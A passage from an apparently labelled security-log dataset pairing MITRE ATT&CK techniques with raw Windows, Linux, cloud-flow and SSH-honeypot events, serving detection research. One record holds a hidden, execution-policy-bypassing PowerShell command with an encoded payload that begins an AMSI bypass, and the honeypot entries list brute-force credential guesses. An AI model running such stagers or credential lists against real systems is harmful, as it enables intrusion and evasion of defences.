Files\Microsoft\Exchange Server\V15\Bin\MSExchangeHMWorker.exe User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: true SourceIsIpv6: true SourceIp: 0:0:0:0:0:0:0:1 SourceHostname: - SourcePort: 30004 SourcePortName: - DestinationIsIpv6: tr || 11. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:33.361 ProcessGuid: {6004D249-FD90-604C-0100-000000000900} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: true SourceIp: 0:0:0:0:0:0:0:1 SourceHostname: - SourcePort: 30004 SourcePortName: - DestinationIsIpv6: true DestinationIp: 0:0:0:0:0:0:0:1 DestinationHostname: - DestinationPo || 12. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:36.080 ProcessGuid: {6004D249-0957-604D-6019-000000000900} ProcessId: 12252 Image: C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeHMWorker.exe User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 192.168.2.5 SourceHostname: - SourcePort: 30006 SourcePortName: - DestinationIsIpv6: false
20
Linux-APT-Dataset-2024
linux
4294967295
12
Discovery
T1083
2024-01-05T18:27:44.598000+03:00
2024-01-07T08:22:58.874000+03:00
1. apparmor_parser || 2. apparmor_parser || 3. apparmor_parser || 4. apparmor_parser || 5. apparmor_parser || 6. apparmor_parser || 7. mysql_upgrade || 8. mariadb || 9. mysql || 10. mysql || 11. xargs || 12. mysql
21
OTRF-Security-Datasets-compound
windows
ADFS01.simulandlabs.com
4
Credential Access
T1649
1. - || 2. - || 3. - || 4. -
22
BRAWL-Dataset
windows
teston-pc
12
Execution
T1059.001
2017-05-01T21:57:42.319000+03:00
2017-05-01T23:21:46.023000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
23
BOTS-v3-Splunk
windows
serverless
12
Execution
T1059
1. 2 622676721278 eni-0feba9896c28639cd 172.16.3.197 172.16.0.178 3306 52708 6 20 30183 1534758315 1534758365 ACCEPT OK || 2. 2 622676721278 eni-0feba9896c28639cd 172.16.0.178 172.16.3.197 52704 3306 6 26 3852 1534758315 1534758365 ACCEPT OK || 3. 2 622676721278 eni-0feba9896c28639cd 172.16.0.178 172.16.3.197 52800 3306 6 28 3956 1534758315 1534758365 ACCEPT OK || 4. 2 622676721278 eni-0feba9896c28639cd 172.16.0.178 172.16.3.197 52708 3306 6 27 3904 1534758315 1534758365 ACCEPT OK || 5. 2 622676721278 eni-0feba9896c28639cd 172.16.3.197 172.16.0.178 3306 52704 6 20 30183 1534758315 1534758365 ACCEPT OK || 6. 2 622676721278 eni-0feba9896c28639cd 172.16.3.197 172.16.0.178 3306 52800 6 20 30183 1534758315 1534758365 ACCEPT OK || 7. 2 622676721278 eni-0feba9896c28639cd 172.16.0.178 172.16.3.197 52802 3306 6 26 3852 1534758315 1534758365 ACCEPT OK || 8. 2 622676721278 eni-0feba9896c28639cd 172.16.3.197 172.16.0.178 3306 52802 6 20 30183 1534758315 1534758365 ACCEPT OK || 9. 2 622676721278 eni-0feba9896c28639cd 172.16.0.178 172.16.3.197 52886 3306 6 27 3904 1534758385 1534758425 ACCEPT OK || 10. 2 622676721278 eni-0feba9896c28639cd 172.16.3.197 172.16.0.178 3306 52964 6 20 30183 1534758385 1534758425 ACCEPT OK || 11. 2 622676721278 eni-0feba9896c28639cd 172.16.0.178 172.16.3.197 52964 3306 6 27 3904 1534758385 1534758425 ACCEPT OK || 12. 2 622676721278 eni-0feba9896c28639cd 172.16.0.178 172.16.3.197 52968 3306 6 26 3852 1534758385 1534758425 ACCEPT OK
24
SSH-Honeypot-2025
linux
6d904053-f99e-4e75-8260-d055f98a4f33
6
Credential Access
T1110
2025-07-31T23:03:43.619276+03:00
2025-07-31T23:03:47.620189+03:00
1. Bot disconnected || 2. Bot entered username: nginx, password: nginx || 3. Bot disconnected || 4. Bot entered username: root, password: aA123456 || 5. Bot disconnected || 6. Bot entered username: gpadmin, password: gpadmin123
25
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Execution
T1047
2020-08-06T10:56:22.801000+03:00
2020-10-10T00:36:36.538000+03:00
1. Network connection detected: RuleName: - UtcTime: 2020-08-06 07:56:19.115 ProcessGuid: {9f85ce58-59d1-5f2b-0100-000000000400} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: false SourceIp: 172.18.39.5 SourceHostname: - SourcePort: 55271 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.38.5 DestinationHostname: - DestinationPort: 44 || 2. An account was logged off. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0xCA4210 Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 3. Network connection detected: RuleName: - UtcTime: 2020-08-06 07:56:21.050 ProcessGuid: {9f85ce58-59ed-5f2b-5000-000000000400} ProcessId: 3616 Image: C:\Windows\System32\dns.exe User: NT AUTHORITY\SYSTEM Protocol: udp Initiated: false SourceIsIpv6: false SourceIp: 172.18.38.5 SourceHostname: - SourcePort: 53 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.39.5 DestinationHostname: || 4. Network connection detected: RuleName: - UtcTime: 2020-08-06 07:56:21.050 ProcessGuid: {9f85ce58-59ed-5f2b-5000-000000000400} ProcessId: 3616 Image: C:\Windows\System32\dns.exe User: NT AUTHORITY\SYSTEM Protocol: udp Initiated: true SourceIsIpv6: false SourceIp: 172.18.38.5 SourceHostname: - SourcePort: 49405 SourcePortName: - DestinationIsIpv6: false DestinationIp: 13.107.252.10 DestinationHostna || 5. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Delegation New Logon: Security ID: S-1-5-21-1363495622-3806888128-621328882-1113 Account Name: WORKSTATION6$ Account Domain: THESHIRE.LOCAL Logon ID: 0xCA4629 Linke || 6. RawAccessRead detected: RuleName: - UtcTime: 2020-08-06 07:56:28.778 ProcessGuid: {9f85ce58-59d8-5f2b-0c00-000000000400} ProcessId: 704 Image: C:\Windows\System32\lsass.exe Device: \Device\HarddiskVolume1 || 7. RawAccessRead detected: RuleName: - UtcTime: 2020-08-06 07:56:28.778 ProcessGuid: {9f85ce58-59d8-5f2b-0c00-000000000400} ProcessId: 704 Image: C:\Windows\System32\lsass.exe Device: \Device\HarddiskVolume1 || 8. Network connection detected: RuleName: - UtcTime: 2020-08-06 07:56:27.729 ProcessGuid: {9f85ce58-59d1-5f2b-0100-000000000400} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: false SourceIp: 172.18.39.6 SourceHostname: - SourcePort: 52543 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.38.5 DestinationHostname: - DestinationPort: 44 || 9. Network connection detected: RuleName: - UtcTime: 2020-08-06 07:56:28.286 ProcessGuid: {9f85ce58-59ed-5f2b-5000-000000000400} ProcessId: 3616 Image: C:\Windows\System32\dns.exe User: NT AUTHORITY\SYSTEM Protocol: udp Initiated: false SourceIsIpv6: false SourceIp: 172.18.38.5 SourceHostname: - SourcePort: 53 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.39.6 DestinationHostname: || 10. An account was logged off. Subject: Security ID: S-1-5-21-1363495622-3806888128-621328882-1112 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0xCA4463 Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 11. Network connection detected: RuleName: - UtcTime: 2020-08-06 07:56:30.297 ProcessGuid: {9f85ce58-59ed-5f2b-5000-000000000400} ProcessId: 3616 Image: C:\Windows\System32\dns.exe User: NT AUTHORITY\SYSTEM Protocol: udp Initiated: false SourceIsIpv6: false SourceIp: 172.18.38.5 SourceHostname: - SourcePort: 53 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.39.6 DestinationHostname: || 12. Network connection detected: RuleName: - UtcTime: 2020-08-06 07:56:33.680 ProcessGuid: {9f85ce58-59ed-5f2b-5000-000000000400} ProcessId: 3616 Image: C:\Windows\System32\dns.exe User: NT AUTHORITY\SYSTEM Protocol: udp Initiated: false SourceIsIpv6: false SourceIp: 172.18.38.5 SourceHostname: - SourcePort: 53 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.39.6 DestinationHostname:
26
Linux-APT-Dataset-2024
linux
2
12
Discovery
T1057
2023-12-24T18:48:18.538000+03:00
2023-12-24T19:16:52.115000+03:00
1. ps || 2. ps || 3. ps || 4. ps || 5. ps || 6. ps || 7. ps || 8. ps || 9. ps || 10. ps || 11. ps || 12. ps
27
OTRF-Security-Datasets-compound
windows
IT01.pandalab.com
12
Credential Access
T1003.001
2023-08-27T06:04:13.307000+03:00
2023-08-27T06:14:29.435000+03:00
1. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Diagnostics.Eventing.Reader.EventLogSession" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 53a75c2d-246a-4298-9015-5c39712e5cdf Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5 || 2. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Diagnostics.Eventing.Reader.EventLogSession" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 53a75c2d-246a-4298-9015-5c39712e5cdf Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5 || 3. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Diagnostics.Eventing.Reader.EventLogSession" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 53a75c2d-246a-4298-9015-5c39712e5cdf Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5 || 4. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Diagnostics.Eventing.Reader.EventLogSession" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 53a75c2d-246a-4298-9015-5c39712e5cdf Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5 || 5. CommandInvocation(Get-Date): "Get-Date" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 53a75c2d-246a-4298-9015-5c39712e5cdf Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.19041.1682 Runspace ID = 57355251-9594-4d7c-a436-5a3c5e4b3cc5 Pipeline ID = 144 Command Name = Get-Date Com || 6. CommandInvocation(Collection-Start.ps1): "Collection-Start.ps1" CommandInvocation(Out-Default): "Out-Default" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 53a75c2d-246a-4298-9015-5c39712e5cdf Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.19041.1682 Runspace ID = 57355251-959 || 7. prompt || 8. RawAccessRead detected: RuleName: - UtcTime: 2023-08-27 22:04:14.737 ProcessGuid: {716d09e4-c858-64eb-3403-000000000600} ProcessId: 5220 Image: C:\Windows\System32\SearchIndexer.exe Device: \Device\Harddisk0\DR0 User: NT AUTHORITY\SYSTEM || 9. "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5220" "1404" "1340" "1408" "0" "0" "1412" "0" "0" "0" "0" "0" || 10. "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5220" "1404" "1340" "1408" "0" "0" "1412" "0" "0" "0" "0" "0" || 11. File created: RuleName: - UtcTime: 2023-08-27 22:04:14.737 ProcessGuid: {716d09e4-c85e-64eb-3503-000000000600} ProcessId: 1180 Image: C:\Windows\system32\wermgr.exe TargetFilename: C:\ProgramData\Microsoft\Windows\WER\Temp\f1177775-e32b-4217-a33b-996b86dccf41 CreationUtcTime: 2023-08-27 22:04:14.737 User: NT AUTHORITY\SYSTEM || 12. File created: RuleName: - UtcTime: 2023-08-27 22:04:14.737 ProcessGuid: {716d09e4-c85e-64eb-3503-000000000600} ProcessId: 1180 Image: C:\Windows\system32\wermgr.exe TargetFilename: C:\ProgramData\Microsoft\Windows\WER\Temp\c2b786ed-ed6e-4aaf-83e2-37d0cbb17d3b CreationUtcTime: 2023-08-27 22:04:14.737 User: NT AUTHORITY\SYSTEM
28
BRAWL-Dataset
windows
zissler-pc
12
Execution
T1059.001
2017-05-01T21:58:52.223000+03:00
2017-05-01T23:21:54.273000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -ep bypass "C:\Progra~1\SplunkUniversalForwarder\etc\apps\fmx_computer_properties\bin\unified_json.ps1" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
29
BOTS-v3-Splunk
windows
splunk.froth.ly
12
Execution
T1059
2018-08-20T14:58:51+03:00
2018-08-20T17:20:52+03:00
1. "MessageTraceId": "b1b2de7b-1e54-4e70-a80a-08d5f26e16d2", "ToIP": "52.38.112.145", "DateReceived": "2018-08-20T11:58:51Z", "SenderAddress": "asterisk-bugs-bounces@lists.digium.com", "Index": 38, "FromIP": "216.207.245.17", "Organization": "frothly.onmicrosoft.com", "MessageId": "<JIRA.63547.1532488560694.7384.1532550894619@prefect>", "Size": 32745, "RecipientAddress": "ubuntu@ec2-52-38-112-145.us- || 2. "Index": 121, "ToIP": "125.209.238.137", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "redmine@jifenn.com", "MessageTraceId": "3b6279d6-1a4b-4d83-0a39-08d5f2bb71c1", "Status": "Delivered", "FromIP": "180.97.80.73", "Size": 24033, "Received": "/Date(1534772734407)/", "MessageId": "<3838878C-CDAD-4A56-AD2F-07C3AB9AEFC4@mail.jifenn.com>", "DateReceived": "2018-08-20T13:45:34Z", "Recipi || 3. "Index": 123, "ToIP": "52.38.112.145", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "redmine@jifenn.com", "MessageTraceId": "3b6279d6-1a4b-4d83-0a39-08d5f2bb71c1", "Status": "Delivered", "FromIP": "180.97.80.73", "Size": 24033, "Received": "/Date(1534772734407)/", "MessageId": "<3838878C-CDAD-4A56-AD2F-07C3AB9AEFC4@mail.jifenn.com>", "DateReceived": "2018-08-20T13:45:34Z", "Recipien || 4. "Index": 118, "ToIP": "125.209.222.14", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "info@lee.org", "MessageTraceId": "4e7e4cf6-5e64-4975-ac04-08d5f2bc680f", "Status": "Delivered", "FromIP": "208.39.73.35", "Size": 35248, "Received": "/Date(1534773147642)/", "MessageId": "<c954fec4-d4c5-410a-8ba4-38585a66ce77@DAC20725EXC723.apps.tmrk.corp>", "DateReceived": "2018-08-20T13:52:27Z", || 5. "Index": 120, "ToIP": "52.38.112.145", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "info@lee.org", "MessageTraceId": "4e7e4cf6-5e64-4975-ac04-08d5f2bc680f", "Status": "Delivered", "FromIP": "208.39.73.35", "Size": 35248, "Received": "/Date(1534773147642)/", "MessageId": "<c954fec4-d4c5-410a-8ba4-38585a66ce77@DAC20725EXC723.apps.tmrk.corp>", "DateReceived": "2018-08-20T13:52:27Z", " || 6. "Index": 113, "ToIP": "125.209.238.137", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "hedgeterncg@gmail.com", "MessageTraceId": "c2b8d7f4-d9c1-472f-ac85-08d5f2bcbcce", "Status": "Delivered", "FromIP": "209.85.208.196", "Size": 29868, "Received": "/Date(1534773289822)/", "MessageId": "<CAPPt_o25d85kSaosKJrAV+dcwwC6G1RHR0jOSvt+zJvxkORtwA@mail.gmail.com>", "DateReceived": "2018-08-20T || 7. "Index": 115, "ToIP": "52.38.112.145", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "hedgeterncg@gmail.com", "MessageTraceId": "c2b8d7f4-d9c1-472f-ac85-08d5f2bcbcce", "Status": "Delivered", "FromIP": "209.85.208.196", "Size": 29868, "Received": "/Date(1534773289822)/", "MessageId": "<CAPPt_o25d85kSaosKJrAV+dcwwC6G1RHR0jOSvt+zJvxkORtwA@mail.gmail.com>", "DateReceived": "2018-08-20T13 || 8. "Index": 5, "ToIP": "185.70.40.101", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "jwortoski@froth.ly", "MessageTraceId": "901b8751-73a9-469b-6ec8-08d5f2c0602f", "Status": "Delivered", "FromIP": "45.62.48.155", "Size": 33978, "Received": "/Date(1534774852415)/", "MessageId": "<DM3PR17MB0569B6AC84DE0B800EA1C7A2CC2B0@DM3PR17MB0569.namprd17.prod.outlook.com>", "DateReceived": "2018-08- || 9. "Index": 6, "ToIP": "93.158.134.89", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "jwortoski@froth.ly", "MessageTraceId": "901b8751-73a9-469b-6ec8-08d5f2c0602f", "Status": "Delivered", "FromIP": "45.62.48.155", "Size": 33978, "Received": "/Date(1534774852415)/", "MessageId": "<DM3PR17MB0569B6AC84DE0B800EA1C7A2CC2B0@DM3PR17MB0569.namprd17.prod.outlook.com>", "DateReceived": "2018-08- || 10. "Index": 7, "ToIP": "74.125.135.26", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "jwortoski@froth.ly", "MessageTraceId": "901b8751-73a9-469b-6ec8-08d5f2c0602f", "Status": "Delivered", "FromIP": "45.62.48.155", "Size": 33978, "Received": "/Date(1534774852415)/", "MessageId": "<DM3PR17MB0569B6AC84DE0B800EA1C7A2CC2B0@DM3PR17MB0569.namprd17.prod.outlook.com>", "DateReceived": "2018-08- || 11. "Index": 8, "ToIP": "74.125.135.26", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "jwortoski@froth.ly", "MessageTraceId": "901b8751-73a9-469b-6ec8-08d5f2c0602f", "Status": "Delivered", "FromIP": "45.62.48.155", "Size": 33978, "Received": "/Date(1534774852415)/", "MessageId": "<DM3PR17MB0569B6AC84DE0B800EA1C7A2CC2B0@DM3PR17MB0569.namprd17.prod.outlook.com>", "DateReceived": "2018-08- || 12. "Index": 9, "ToIP": "74.125.135.26", "Organization": "frothly.onmicrosoft.com", "SenderAddress": "jwortoski@froth.ly", "MessageTraceId": "901b8751-73a9-469b-6ec8-08d5f2c0602f", "Status": "Delivered", "FromIP": "45.62.48.155", "Size": 33978, "Received": "/Date(1534774852415)/", "MessageId": "<DM3PR17MB0569B6AC84DE0B800EA1C7A2CC2B0@DM3PR17MB0569.namprd17.prod.outlook.com>", "DateReceived": "2018-08-
30
SSH-Honeypot-2025
linux
f75de186-4776-448f-ab7b-27416a1080fc
6
Credential Access
T1110
2025-07-31T23:34:14.528476+03:00
2025-07-31T23:34:17.103464+03:00
1. Bot disconnected || 2. Bot entered username: git, password: 123456 || 3. Bot disconnected || 4. Bot entered username: postgres, password: 123 || 5. Bot disconnected || 6. Bot entered username: svnuser, password: 123456
31
OTRF-Security-Datasets-atomic
windows
MORDORDC.mordor.local
12
Privilege Escalation
T1055.001
2020-07-22T07:01:25.144000+03:00
2020-07-22T07:04:51.386000+03:00
1. Special privileges assigned to new logon. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: MORDOR Logon ID: 0x57004FE Privileges: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege || 2. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: MORDOR.LOCAL Logon ID: 0x57004FE Linked Logon ID: 0x0 Network Account Name: - || 3. An account was logged off. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: MORDOR Logon ID: 0x57004FE Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 4. Network connection detected: RuleName: - UtcTime: 2020-07-22 04:01:23.056 ProcessGuid: {47b21e2e-9538-5f14-4d00-000000000400} ProcessId: 3484 Image: C:\Windows\System32\dns.exe User: NT AUTHORITY\SYSTEM Protocol: udp Initiated: false SourceIsIpv6: false SourceIp: 172.18.38.5 SourceHostname: - SourcePort: 53 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.39.6 DestinationHostname: || 5. Network connection detected: RuleName: - UtcTime: 2020-07-22 04:01:23.828 ProcessGuid: {47b21e2e-9538-5f14-4a00-000000000400} ProcessId: 3424 Image: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: true SourceIsIpv6: true SourceIp: 0:0:0:0:0:0:0:1 SourceHostname: - SourcePort: 64715 SourcePortName: - DestinationIsIpv6: true DestinationIp: || 6. Network connection detected: RuleName: - UtcTime: 2020-07-22 04:01:23.828 ProcessGuid: {47b21e2e-9523-5f14-0c00-000000000400} ProcessId: 704 Image: C:\Windows\System32\lsass.exe User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: true SourceIp: 0:0:0:0:0:0:0:1 SourceHostname: - SourcePort: 64715 SourcePortName: - DestinationIsIpv6: true DestinationIp: 0:0:0:0:0:0:0:1 Destination || 7. File created: RuleName: - UtcTime: 2020-07-22 04:01:41.245 ProcessGuid: {47b21e2e-952d-5f14-2200-000000000400} ProcessId: 1504 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive0.dat CreationUtcTime: 2020-07-19 18:47:10.365 || 8. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2534 Process Information: Process ID: 0x6b8 Process Name: C:\Windows\System32\svchost.exe || 9. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x510 Resource Attributes: - Process Information: Process ID: 0x6b8 Process Name: C:\Windows\System32\svchost.exe Access Req || 10. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x510 Resource Attributes: - Process Information: Process ID: 0x6b8 Process Name: C:\Windows\System32\svchost.exe Access || 11. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x510 Process Information: Process ID: 0x6b8 Process Name: C:\Windows\System32\svchost.exe || 12. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x20ac Process Information: Process ID: 0x6b8 Process Name: C:\Windows\System32\svchost.exe
32
Linux-APT-Dataset-2024
linux
machine-1
10
Privilege Escalation
T1548.003
2023-10-04T22:13:35.493000+03:00
2023-10-05T20:35:00.353000+03:00
1. /usr/bin/systemctl start ssh || 2. /bin/bash || 3. /usr/bin/systemctl start ssh || 4. /usr/bin/apt update || 5. /usr/bin/apt upgrade -y || 6. /bin/bash || 7. /usr/bin/apt -y install apache2 mariadb-server php php-mysqli php-gd libapache2-mod-php || 8. /usr/bin/mysql_secure_installation || 9. /usr/bin/git clone https://github.com/digininja/DVWA.git || 10. /usr/bin/chown -R www-data:www-data /var/www/html/DVWA /var/www/html/index.html
33
OTRF-Security-Datasets-compound
windows
WORKSTATION5
12
Initial Access
T1190
1. powershell.exe || 2. conhost.exe || 3. powershell.exe || 4. powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0Acw || 5. \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 || 6. powershell.exe || 7. powershell.exe || 8. powershell.exe || 9. powershell.exe || 10. powershell.exe || 11. powershell.exe || 12. powershell.exe
34
BRAWL-Dataset
windows
dc
12
Execution
T1059.001
2017-05-01T21:58:00.211000+03:00
2017-05-01T23:22:02.650000+03:00
1. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 6. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 7. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 12. "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
35
BOTS-v3-Splunk
windows
gacrux.i-06fea586f3d3c8ce8
12
Execution
T1059
2018-08-20T18:16:17+03:00
2018-08-20T18:27:09+03:00
1. {"endtime":"2018-08-20T15:16:17.319345Z","timestamp":"2018-08-20T15:16:17.297557Z","bytes":196,"src_ip":"13.125.33.130","src_mac":"02:4F:D7:61:53:04","bytes_in":172,"packets_in":2,"protocol":"UDP","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70","bytes_out":24,"packets_out":1,"flow_id":"cd13b27d-2ed9-4845-824e-8c260987864e","protoid":17,"version":4,"tos":0,"fragment_count":0,"protocol_stack || 2. {"endtime":"2018-08-20T15:16:17.319345Z","timestamp":"2018-08-20T15:16:17.297557Z","app":"udp","bytes":298,"bytes_in":240,"bytes_out":58,"dest_content":"\u0000\u0000\u0000\u0000\u0000\u0001\u0000\u0000STORED\r\n","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70","dest_port":11211,"flow_id":"cd13b27d-2ed9-4845-824e-8c260987864e","packets_in":2,"packets_out":1,"protocol_stack":"ip:udp:unknown" || 3. 